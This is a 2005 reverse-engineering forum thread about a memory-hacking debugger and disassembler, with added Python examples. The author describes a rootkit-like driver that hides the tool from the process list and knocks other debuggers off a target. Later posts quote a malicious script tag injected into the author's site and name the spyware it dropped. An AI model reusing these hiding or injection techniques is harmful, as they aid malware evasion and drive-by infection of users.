Memory Hacking Software 2.0.4.7
L. Spiro
August 26th, 2005, 14:07
I would appreciate input on this project.
I am quite dedicated to it and I would like to have input from experienced others on what could be upgraded/added/modified.
I know that currently it is missing some obvious features, such as Copy in the Disassembler, but these are details I just have to get around to doing.
Aside from the minor details, what actual features could be added to improve this software?
It can be found here
http://www.gwforum.ca/l-spiro/ (NOTE: Some people have experienced problems visiting this page. It seems there is a risk that the site has been hacked. For that reason, I am posting a direct link to the software. Hopefully there are no problems with this link.)
Direct link to the package: http://www.gwforum.ca/l-spiro/MemHack/MemHack%202.0.5.1.zip (it works now).
I am mostly interested in what can be improved on the debugger/disassembler.
I will give a brief overview of the current features related to these two areas.
Debugger:
Software Read/Write/Access/Execute breakpoints.
Hardware Write/Access/Execute breakpoints.
Conditional Breakpoints: Create conditions using a simple wizard. You can compound any number of conditions together on a breakpoint (&& and || operators) and use parentheses to denote precedence. Operands can be hit count, specific value (example: 56), registers (example: EBX), registers as addresses (example: [EBP]), and addresses (example: [0x124EFC]). More conditions can be added via DLL plug-ins.
Assignable Functions to Breakpoints: Breakpoints do whatever you want, from loading the Disassembler to printing a message. If you need more functions, you can create a DLL plug-in. You can assign 3 functions (both built-in functions and your own custom plug-in functions) to any breakpoint in any order and combination.
Saving Breakpoints: You can save your breakpoints and load them later. All saves are relative to the base DLL address, so if the DLL moves, the breakpoint will still be loaded to the correct location.
Disassembler:
Decodes Addresses: Addresses can be assigned any type, including classes, structures, and typedefs (the Template Editor allows you to define these). When assigned, they will be decoded depending on their type. If an address is decoded into a structure or class, each member of the structure/class will be shown by name and value, using the same style as is used in Visual Studio.
Single-Step, Step Over and Step Out (pRET).
Comments: Add your own comments to addresses to leave yourself notes.
NOP: NOP’ing is remembered and the pop-up menu allows you to undo NOP’ing quickly.
Highlights: Jumps, calls, and various other tidbits are highlighted for ease in viewing. See Picture #1.
Import Functions: The Template Importer allows you to scan header files for function definitions which the Disassembler can use to display more detailed information about functions. My database is currently at 34,922 functions complete with full parameter names and types, created from scanning Windows® header files.
Map Locals and Parameters: Memory Hacking Software is able to determine function parameters and locals for unknown functions and then map them over RAM while in single-stepping mode. As they are accessed, they are shown in color so you can see them easily. Locals are in green and parameters are in purple. See Picture #2 and Picture #3.
Visual Appearance: Well, I am still working on this, but so far you can change to any font you want and change the colors. You can also change the output from the Disassembler in a variety of ways.
Picture #1 - http://www.gwforum.ca/l-spiro/HiLightJumps.gif
Picture #2 - http://www.gwforum.ca/l-spiro/MappedParams.gif
Picture #3 - http://www.gwforum.ca/l-spiro/InsideFunction.png
Again, any feedback is appreciated.
L. Spiro
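An added example, not code from Memory Hacking Software (the post shows none): a small evaluator for compound breakpoint conditions of the kind the wizard above builds, with && and || operators, parentheses, and the operands listed (hit count, literal values such as 56, registers such as EBX, registers as addresses such as [EBP], and addresses such as [0x124EFC]), run against a constructed debugger snapshot. The grammar, the comparison operators, and the state dictionary with its "regs", "mem" and "hits" keys are assumptions.

```python
import operator, re

# Grammar modelled on the wizard described above (an assumption, not MHS's own code):
#   expr := and ('||' and)* ; and := cmp ('&&' cmp)* ; cmp := '(' expr ')' | operand OP operand
#   operand := hitcount | number (56, 0x1F) | register (EBX) | [register] | [0x124EFC]
TOKEN = re.compile(r"\s*(\|\||&&|==|!=|<=|>=|<|>|\(|\)|\[[^\]]+\]|0x[0-9A-Fa-f]+|\d+|[A-Za-z_]\w*)")
OPS = {"==": operator.eq, "!=": operator.ne, "<": operator.lt,
       "<=": operator.le, ">": operator.gt, ">=": operator.ge}
SAMPLE_STATE = {"regs": {"EBX": 56, "EBP": 0x12FF80, "EAX": 1},          # constructed snapshot:
                "mem": {0x12FF80: 0x124EFC, 0x124EFC: 7}, "hits": 3}    # regs, mapped dwords, hits

def tokenize(text):
    toks = TOKEN.findall(text)
    if re.sub(r"\s+", "", "".join(toks)) != re.sub(r"\s+", "", text):  # characters outside the grammar
        raise ValueError("unrecognised input in %r" % (text,))
    return toks

def operand(tok, state):
    """Resolve one operand; [x] is a 32-bit read at whatever x resolves to (one level)."""
    if tok.startswith("["):
        return state["mem"].get(operand(tok[1:-1].strip(), state), 0)  # unmapped reads as 0
    if tok.lower() == "hitcount":
        return state["hits"]
    if tok[0].isdigit():
        return int(tok, 16 if tok.lower().startswith("0x") else 10)
    return state["regs"][tok.upper()]

def breakpoint_fires(condition, state):
    toks, pos = tokenize(condition), [0]
    def peek():
        return toks[pos[0]] if pos[0] < len(toks) else None
    def take():
        if pos[0] >= len(toks):
            raise ValueError("condition ends unexpectedly")
        pos[0] += 1
        return toks[pos[0] - 1]
    def chain(sep, sub, fold):                 # left-associative run of `sub` joined by `sep`
        val = sub()
        while peek() == sep:
            take()
            val = fold(val, sub())             # right side always parsed, so errors surface
        return val
    def expr():                                # '||' has the lowest precedence
        return chain("||", and_expr, lambda a, b: a or b)
    def and_expr():                            # '&&' binds tighter than '||'
        return chain("&&", cmp, lambda a, b: a and b)
    def cmp():                                 # parentheses override precedence
        if peek() == "(":
            take()
            val = expr()
            if take() != ")":
                raise ValueError("missing ')'")
            return val
        lhs, op = operand(take(), state), take()
        if op not in OPS:
            raise ValueError("expected comparison, got %r" % (op,))
        return OPS[op](lhs, operand(take(), state))
    result = expr()
    if peek() is not None:
        raise ValueError("unexpected token %r" % (peek(),))
    return bool(result)
```

breakpoint_fires("(hitcount >= 3 && EBX == 56) || [0x124EFC] > 100", SAMPLE_STATE) returns True for the snapshot above; a malformed condition raises ValueError instead of silently never firing.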
Kayaker
August 26th, 2005, 14:35
Hi, I edited your links so they displayed properly (external clickable links aren't supported).
Kayaker
SiGiNT
August 26th, 2005, 15:23
I don't know what's up with this, but the links to the graphic files are fine - going to the main page, Norton has a heart attack, blocking and deleting several "virii" - use caution.
SiGiNT
L. Spiro
August 26th, 2005, 22:17
Quote: Hi, I edited your links so they displayed properly (external clickable links aren't supported).
I see.
Thank you for that.
Quote: I don't know what's up with this, but the links to the graphic files are fine - going to the main page, Norton has a heart attack, blocking and deleting several "virii" - use caution.
Well, there aren’t any actual viruses on the page or in the software, but one of its other features is to hide from the process list.
To accomplish this, I use a system driver which anti-virus software tags as having a root-kit trojan.
This feature is not required to run Memory Hacking Software, so if your anti-virus tags it and deletes it, it is okay.
The only time it is loaded is when it hides itself or when it knocks another debugger off the target software (if it is already being debugged).
dbk32.sys is the device driver that performs these operations and dbk32.dll is a wrapper for the driver. If you (or your software) delete dbk32.sys, you must also delete dbk32.dll.
L. Spiro
SiGiNT
August 27th, 2005, 01:54
I didn't download the software; the problems with Norton were simply from visiting the page. And what's with the message box filled with gibberish and an OK button that will not close? (No, I didn't click the button.) I shut down the IE process independently. I don't know about anyone else, but unless there are any other reports, from someone I know, that this site is safe, I'm not going there.
SiGiNT
L. Spiro
August 27th, 2005, 02:18
That is odd to say the least.
I have never heard of this happening to anyone else.
The site is fine; there are no pop-ups or viruses on it.
Unless it’s been hacked.
But it still works fine for me and some others, so that isn’t a possibility.
Pop-ups are lame so I don’t use them.
If you are getting one, it would definitely be something on your end acting up.
It is understandable to have many anti-virus software installed and blockers/ad-removals when you frequent this type of board and engage in this type of activity, but unfortunately these types of software are known for misbehaving and calling false alarms.
Of course, a message box filled with gibberish is new to me.
I suspect it means you already have some kind of trojan/virus.
Anyway, I am not suggesting you take my word for it.
We will wait until others go there and report back.
I’ve already added a few more options but not enough to warrant its own release.
I work on this night and day, and any input on making it better will be appreciated.
L. Spiro
Knight
August 27th, 2005, 04:39
For me both sites work fine, without a single pop-up.
SiGiNT, in the Syser Debugger thread you said that it caused you some problems. Maybe these things are related, and maybe the problem is not in Spiro's site and not in Syser, but, like Spiro already said, you already have a trojan/virus/adware/etc.
Regards
andrewg
August 27th, 2005, 08:11
Some software will automatically download other pages in an effort to speed up downloads; perhaps this is what triggered the AV alarm. Granted, without knowing what browser and plugins/additions you're using, it's hard to make that call.
blabberer
August 27th, 2005, 08:40
Quote: Map Locals and Parameters
Hey, how are you accomplishing this? Are you pulling the PDBs, or do you have an internal database for all those structs?
Labelling locals means I have some software where I have my own structs, like:
    typedef struct _MY_STRUCT {
        ulong blah;
        ushort blah1;
        wchar balh2;
        longlong blah3;
    } MY_STRUCT, *PMY_STRUCT;
    LOCAL mystru:MY_STRUCT;
    call mycall(&mystru, blah4, MY_USELESS_CONSTANT)
Will it be able to label this mystru, or some kind of similar locals and args?
Also, does it label them inside the disassembly, or show them as comments?
I saw the screenshot; it seems it shows them as comments.
Or for example
Is the source available, or will it be made available?
Hope to test it some time soon.
Thanks and regards
L. Spiro
August 27th, 2005, 09:08
It can create an internal database for you.
You can scan header files to get function definitions and structures/classes.
It stores all the information and when a function is discovered with a known name it counts the parameters in that function.
Then it determines if, by name and parameter count, it can get a match from the database of functions.
If it gets a match, it applies the known parameter names and types to the function it discovered.
Then it goes on to count the locals.
It does not in any way store any database of known function locals, because it is up to the compiler how to spread the locals over a function’s local stack, so it cannot be predicted.
Instead, it scans the disassembly for them and logs what it finds.
For each local, a type and name is supplied. It takes a guess to determine what type the locals are.
All this information is then stored and attached to that function, which, when called or referenced, will be shown as a comment as you see in the pictures.
After that, you can right-click the function in the output and modify anything you like.
You can rename the function, locals, and parameters, and reassign them types.
Regarding types: When it scans a file and extracts a structure or class, it preserves the basic data types and names and aligns them correctly so that they can be mapped over RAM as the real structure/class would be mapped over RAM.
This allows it to simply lay a struct/class over the RAM and then print the address, type, name, and value of each item in the struct/class.
You can also define typedefs and assign them to locals and parameters.
Regarding the extraction: It scans header/code files in almost the same way as when your compiler checks the code. It stores macros created with #define and parses #if, #ifdef, #ifndef, etc., statements correctly. It generates a preprocessed file.
Then it scans that file, keeping track of typedefs, and imports all the functions/structs/classes.
Using your struct as an example, it will be able to resolve “ulong” into “unsigned long”, and the others will be resolved to their respective types.
Then it will store the typedefs of that struct, and when other structs/classes/functions use that struct by its typedef name, it will be resolved to either “_MY_STRUCT” or “_MY_STRUCT *”, depending on which typedef is used.
If it is a function that uses a “PMY_STRUCT” as a parameter, it will keep the typedef name “PMY_STRUCT” and resolve to the correct struct and pointer depth when mapping over RAM for use in displaying locals and parameters.
If you want to create your own database, go to Tools/Template Editor, hit Import, and check the “Header Files” box. You will need to set the #include paths, and it is recommended that you add a few of the basic Windows® macros such as _MSC_VER, WINVER, _WIN32_WINNT, and _WIN32_WINDOWS.
Remember, it works in the same way as a compiler would, so if you want to use “ulong” as a type, you need to either #define it or typedef it, either directly in your source or in an #include’d header file.
L. Spiro
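An added example, not the Template Editor's own code: a struct layout and RAM-mapping routine that does what the reply describes, resolving typedefs such as ulong down to base types, assigning member offsets with natural alignment, laying the struct over a captured byte buffer, and producing an address/type/name/value line per member. It uses blabberer's MY_STRUCT and a second constructed struct that needs padding; the 32-bit MSVC type sizes, the default /Zp8 packing, and the sample bytes are assumptions.

```python
import struct

# Base types as the importer would resolve them after preprocessing a header; sizes follow
# 32-bit MSVC, which the Windows® headers the tool scans are written for (assumption).
BASE_TYPES = {                          # name -> (size, little-endian struct format)
    "char": (1, "<b"), "unsigned short": (2, "<H"), "wchar_t": (2, "<H"),
    "int": (4, "<i"), "unsigned long": (4, "<L"), "long long": (8, "<q"),
}
# typedefs harvested from the scanned header, here blabberer's ulong/ushort/wchar/longlong
TYPEDEFS = {"ulong": "unsigned long", "ushort": "unsigned short",
            "wchar": "wchar_t", "longlong": "long long"}

def resolve(typename):
    """Follow typedef chains down to a base type, as the preprocessed scan does."""
    while typename in TYPEDEFS:
        typename = TYPEDEFS[typename]
    if typename not in BASE_TYPES:
        raise ValueError("unknown type %r: #define or typedef it in a scanned header" % typename)
    return typename

def layout(members, pack=8):
    """Assign offsets with natural alignment capped at `pack` (MSVC /Zp8 default).
    Returns ([(name, typename, offset, size)], total size including tail padding)."""
    offset, max_align, fields = 0, 1, []
    for name, typename in members:
        size = BASE_TYPES[resolve(typename)][0]
        align = min(size, pack)
        offset = (offset + align - 1) // align * align    # pad up to the member's alignment
        fields.append((name, typename, offset, size))
        offset += size
        max_align = max(max_align, align)
    total = (offset + max_align - 1) // max_align * max_align
    return fields, total

def map_over_ram(members, ram, ram_base, addr):
    """Lay the struct over `ram` (bytes captured from ram_base) at addr and decode each member."""
    fields, _ = layout(members)
    decoded = []
    for name, typename, off, _size in fields:
        fmt = BASE_TYPES[resolve(typename)][1]
        (value,) = struct.unpack_from(fmt, ram, addr - ram_base + off)
        decoded.append((addr + off, typename, name, value))
    return decoded

def describe(decoded):
    """One line per member, 'address type name = value', like the Disassembler's comments."""
    return ["%08X %-8s %-6s = %r" % row for row in decoded]

# Constructed sample: 16 bytes of filler, then blabberer's MY_STRUCT at 0x0012FF10
MY_STRUCT = [("blah", "ulong"), ("blah1", "ushort"), ("balh2", "wchar"), ("blah3", "longlong")]
RAM_BASE = 0x0012FF00
SAMPLE_RAM = b"\xcc" * 16 + struct.pack("<LHHq", 0x11223344, 0x5566, ord("A"), -1) + b"\xcc" * 8

if __name__ == "__main__":
    for line in describe(map_over_ram(MY_STRUCT, SAMPLE_RAM, RAM_BASE, 0x0012FF10)):
        print(line)
```

For MY_STRUCT the members land at offsets 0, 4, 6 and 8 with a 16-byte total; a struct such as {char; long long; unsigned short} shows the padding the alignment step inserts (offsets 0, 8, 16; 24 bytes).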
SiGiNT
August 27th, 2005, 11:28
L Spiro,
I apologize if you think I accused you of directing us to an infected site - and there is a possibility of false positives - hell, Norton with the most recent updates labels PEiD 0.93 as a Trojan, as well as the accompanying plug-ins - apparently it's using "heuristic" detection now - something it has not done in the past - as for problems I thought might be related to Syser, I've solved the annoyances that popped up after uninstallation and now believe my Search Companion problem is probably related to uninstalling the commercial version of RealPlayer - but that would not have had an effect on my experience on the web page, as I went to it during lunch at work where I have no RE tools installed or other related utilities - admittedly they recently upgraded our installations of Norton - but that doesn't explain the pop-up - the experience was very similar to visiting some of the more seedy Russian warez sites. I have a machine here at home dedicated to risky web searching and I'll take another look today, as I'm interested in your tool. I'll let you know!
Thanx for your contribution.
SiGiNT
LLXX
August 27th, 2005, 19:12
I can assure you I have visited the site (with a secured IE) and find nothing of concern. It's safe.
evlncrn8
August 27th, 2005, 21:07
Yup, the site seemed fine for me too, using Firefox.
naides
August 27th, 2005, 21:17
Note:
My firewall, BlackIce, gives me a warning "rogue application" when I access http://www.gwforum.ca/l-spiro/ using IE.
Netscape or Firefox goes under the radar.
SiGiNT
August 27th, 2005, 22:05
One more good reason to switch to Firefox or Opera for good - old habits are hard to break - anyway, I was at work and don't have a choice - but in support of someone else's point, there is something going on here at home - something I was working on today, a newer version of an old familiar target, is giving me odd error messages for no apparent reason - I think I need to do some major repair on my OS here - or finally upgrade to "PRO".
SiGiNT
L. Spiro
August 28th, 2005, 01:49
Memory Hacking Software 2.0.4.8 is up.
A few options added to the Disassembler and a problem was resolved regarding importing structs/classes/functions.
I decided I should get that problem fixed quickly before anyone bumps into it.
Same site: http://www.gwforum.ca/l-spiro/
L. Spiro
goggles99
August 28th, 2005, 17:24
Quote (originally posted by sigint33): L Spiro, I apologize if you think I accused you of directing us to an infected site ...
Don't bother apologizing; it's true. I read your post and decided to check this out. My sandbox (for testing) computer was infected by visiting this site with 2 spywares. I was using a patched Internet Explorer, and that was the only page that I had open. My cursor changed to an hourglass shortly after the page loaded, then I could hear my hard drive scratching furiously as if something was accessing it. A second later, ZoneAlarm started asking about 2 exec files trying to access the internet: "msvb_default.exe", which downloads "regscan.exe". Both spywares.
Here is what's happening: a JavaScript file is dynamically loaded onto the page, but only once per IP address. If you visit the site again, no .JS file. The server is logging your IP and only delivering it once. The .JS file has a random name that is 7 characters long. It is dynamic content and cannot be accessed directly by typing its URL into your browser.
Here is an example (it was inserted above the <head>):
<script language=JavaScript src=/xknlbht.js></script>
Typing http://www.gwforum.ca/l-spiro/xknlbht.js afterward won't work because the content will be gone. (I captured the JS file via a sniffer, as it didn't seem to cache either.)
It obviously is taking advantage of some IE security hole (Got Firefox?). It appears that either Spiro or Kuntor set this up, or the server is hacked (prob. from a phpBB exploit).
The URLs "trustbid.ws" and "stats4all.ws" are referenced several times in the JS file. It is possible that the server is hacked.
See here for an explanation: http://forum.ev1servers.net/showthread.php?t=54363
http://www.jregrassroots.org/forums/?showtopic=14401
or Google your own research.
I'm willing to give Spiro the benefit of the doubt for a while...
But get this cleaned up. Maybe you should offer a warning next to your link until this is taken care of; meanwhile your name is being dragged through the mud.
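An added example, not part of goggles99's post: a check a site owner could run on a freshly fetched copy of a page (from an address the server has not yet seen, given the once-per-IP delivery described above) that lists script includes either placed before <head>, where the captured tag sat, or absent from the owner's own allowlist. The sample HTML, the allowlist and the menu.js name are constructed.

```python
from html.parser import HTMLParser

class ScriptAudit(HTMLParser):
    """Record every <script src=...> and whether it was placed before the page's <head>."""
    def __init__(self):
        super().__init__()
        self.seen_head = False
        self.scripts = []                       # (src, before_head, line number)
    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self.seen_head = True
        elif tag == "script":
            src = dict(attrs).get("src")        # unquoted values like src=/xknlbht.js parse fine
            if src is not None:
                self.scripts.append((src, not self.seen_head, self.getpos()[0]))

def audit_page(html, allowed_scripts):
    """Return script includes the site owner did not put there: unknown src, or before <head>.
    A page with no <head> at all reports every script as misplaced, which is itself worth a look."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for src, before_head, line in parser.scripts:
        if before_head:
            findings.append({"src": src, "line": line, "reason": "placed before <head>"})
        elif src not in allowed_scripts:
            findings.append({"src": src, "line": line, "reason": "not in allowlist"})
    return findings

# Constructed sample: the tag goggles99 captured, prepended to an otherwise ordinary page
SAMPLE_PAGE = """<script language=JavaScript src=/xknlbht.js></script>
<html><head><title>Memory Hacking Software</title>
<script src="/l-spiro/menu.js"></script></head>
<body><a href="MemHack/MemHack%202.0.5.1.zip">Download</a></body></html>"""
ALLOWED_SCRIPTS = {"/l-spiro/menu.js"}        # what the owner knows the page should include

if __name__ == "__main__":
    for f in audit_page(SAMPLE_PAGE, ALLOWED_SCRIPTS):
        print("line %d: %s (%s)" % (f["line"], f["src"], f["reason"]))
```

Because the injected include is served only once per client address, run the fetch from a vantage point the server has not seen and compare the result against a known-good copy of the page rather than against a second fetch from the same machine.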
SiGiNT
August 28th, 2005, 18:43
goggles99,
Thanx for the info. I also visited the site yesterday with my minimally protected sacrificial machine, Norton + WinXP SP2 firewall only. I appeared to have no problem, but I did notice that the link info on the bottom bar of IE was blinking furiously; I shrugged it off, explored a bit and shut down. I will scan the machine later. My best guess is that the page is being hacked - maybe by different people at different times - on my machine at work Norton blocked a trojan and deleted another, and there was the message box filled with ahahahahah - and an OK button - I assume the box was supposed to be filled with what represented laughter - I don't think L Spiro would give us a link to his ISP's personal web space page if he was aware that there was malicious content.
SiGiNT
L. Spiro
August 29th, 2005, 00:53
I will direct kunt0r to this information when he comes online next.
I’m still not getting these things.
I searched for both msvb_default.exe and regscan.exe and neither are on my computer, and of course I visit the page frequently.
If there is some kind of problem, it has to be a hack job.
Since kunt0r is running the site, I will have him look into it.
I will post direct links to the software packages.
L. Spiro
kunt0r examined the page and said he could find nothing.
I downloaded every php file from the server and they each matched my own local files, which are definitely clean.
His words:
<kunt0r> spiro
<kunt0r> I checked your site
<kunt0r> doesnt seem like anythings wrong with it
<kunt0r> you might want to download all your php's and read through them to see if anyone added shit
<kunt0r> check every php file, make sure there's no .js files
<kunt0r> dunno if it happened or if that guys just got a fucked up computer
<kunt0r> you can tell them that my site was compromised and someone did mess with my php's and did upload some js's, but I cleaned house and closed the exploit
<kunt0r> and I checked your shit like a week back to make sure no one messed with it as well
<kunt0r> and added that .htaccess to block all scripts
Well, I can’t say what has happened before, but I update the main page often, so if some cracker thinks he is funny by modifying it, his changes would only last about a day.
I have updated the page since these reports first came in, so anything wrong with the pages back then would be lost now, which is of course a good thing, but also makes it very hard to determine if they were indeed modified.
In any case, the direct link is posted so there is no longer a threat of modified php files doing things we don’t want.
L. Spiro
September 6th, 2005, 12:51
Sorry to bump.
Uploading 2.0.5.1 was troublesome; the server kept cutting off the download, creating corrupted .ZIP files. It took several days to get a good copy up, and in that time I am sure some people may have tried to download it, found it corrupt, then forgot about it.
I am just wondering if anyone has any input, since my site’s problems seemed to get everyone sidetracked.
The link is on the main page and here: http://www.gwforum.ca/l-spiro/MemHack/MemHack%202.0.5.1.zip
Again, input is appreciated.
L. Spiro
SiGiNT
September 6th, 2005, 13:42
Thanx!
A direct link to the download solves all the previous problems even if they still exist - my guess is a webcrawler flagged your site as using the word "hacking", and it became fair game for all the pre-pubescent BlackHats out there.
SiGiNT
Fartzalot
September 16th, 2005, 11:24
A message box filled with gibberish? Sounds like Windows Messenger, the network notification service, being hijacked. Turn it off on that PC, except you were at work, so you are stuck with it. But check with your sysadmin; they might let you kill it.